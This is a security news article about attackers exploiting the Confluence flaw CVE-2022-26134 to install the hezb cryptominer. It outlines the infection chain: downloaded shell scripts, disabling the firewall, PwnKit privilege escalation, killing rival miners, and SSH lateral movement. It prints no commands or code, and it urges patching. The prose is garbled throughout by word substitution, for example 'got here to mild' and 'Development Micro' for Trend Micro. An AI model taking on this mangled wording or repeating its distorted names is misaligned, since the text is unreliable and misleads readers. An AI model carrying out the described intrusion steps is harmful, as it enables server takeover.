A now-patched crucial safety flaw affecting Atlassian Confluence Server that got here to mild just a few months in the past is being actively exploited for illicit cryptocurrency mining on unpatched installations.
“If left unremedied and efficiently exploited, this vulnerability could possibly be used for a number of and extra malicious assaults, resembling a whole area takeover of the infrastructure and the deployment data stealers, distant entry trojans (RATs), and ransomware,” Development Micro risk researcher Sunil Bharti said in a report.
The difficulty, tracked as CVE-2022-26134 (CVSS rating: 9.8), was addressed by the Australian software program firm in June 2022.
In one of many an infection chains noticed by the cybersecurity firm, the flaw was leveraged to obtain and run a shell script (“ro.sh”) on the sufferer’s machine, which, in flip, fetched a second shell script (“ap.sh”).
The malicious code is designed to replace the PATH variable to incorporate further paths resembling “/tmp”, obtain the cURL utility (if not already current) from a distant server, disable iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to achieve root privileges, and in the end deploy the hezb crypto miner.
Like different cryptojacking assaults, the shell script additionally terminates different competing coin miners, disables cloud service supplier brokers from Alibaba and Tencent, earlier than finishing up lateral motion by way of SSH.
Lacework’s evaluation additional exhibits that the command-and-control (C2) server used to retrieve the cURL software program in addition to the hezb miner additionally distributed a Golang-based ELF binary named “kik” that permits the malware to kill processes of curiosity.
Customers are suggested to prioritize patching the flaw because it could possibly be abused by risk actors for different nefarious functions.
“Attackers might make the most of injecting their very own code for interpretation and achieve entry to the Confluence area being focused, in addition to conduct assaults starting from controlling the server for subsequent malicious actions to damaging the infrastructure itself,” Bharti mentioned.